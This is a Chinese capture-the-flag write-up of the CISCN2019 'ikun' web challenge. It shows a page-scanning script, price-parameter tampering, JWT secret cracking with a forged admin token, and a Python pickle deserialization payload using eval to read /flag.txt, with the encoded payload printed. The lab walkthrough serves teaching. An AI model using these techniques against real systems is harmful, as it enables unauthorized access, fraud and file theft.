[CISCN2019 华北赛区 Day1 Web2]ikun

要买lv6

然后下一页下一页的找,也找不到

来个脚本爆破一下

#coding:utf-8
import requests
import time
for i in range(1,200):
    print(i)
    url = 'http://17dfa3f4-2826-4b97-9d61-a920b6c8976f.node4.buuoj.cn:81/shop?page={}'.format(i)
    r = requests.get(url)
    if 'lv6.png' in r.text:
        print(i)
        break
    if r.status_code == 429:
        print("too fast")
        time.sleep(2)

发现在181页

要买的话我们要先注册一个账号,然后登录

很显然,买不起

看下一购物车

这里有个折扣,我们抓包看一下

这里刚好对应上面的折扣,我们改成0.0000001

还注意到上面有个jwt签名

工具地址:GitHub - brendan-rius/c-jwt-cracker: JWT brute force cracker written in C

解出来,是1Kun

JSON Web Tokens - jwt.io上伪造一份admin的签名

得到

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.40on__HQ8B2-wM1ZSwax3ivRK4j54jlaXv-1JjQynjo

然后bp改包

页面源代码

访问/static/asd1f654e683wq/www.zip,得到源码

下面就是代码审计

新知识:Python Pickle反序列化漏洞

Python Pickle反序列化漏洞 - FreeBuf网络安全行业门户

简而言之,pickle的loads在进行反序列化的时候会调用__reduce__魔术方法,也就可以利用该魔术方法构造payload

Admin.py:

脚本:

import pickle
import urllib

class Test(object):
    def __reduce__(self):
        return (eval, ("open('/flag.txt','r').read()" ,))

a = Test()
s = pickle.dumps(a)
print(urllib.quote(s))

 得到:

c__builtin__%0Aeval%0Ap0%0A%28S%22open%28%27/flag.txt%27%2C%27r%27%29.read%28%29%22%0Ap1%0Atp2%0ARp3%0A.

刚刚的大会员页面,点击一键成为大会员,并进行抓包,修改become的值

得到flag

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值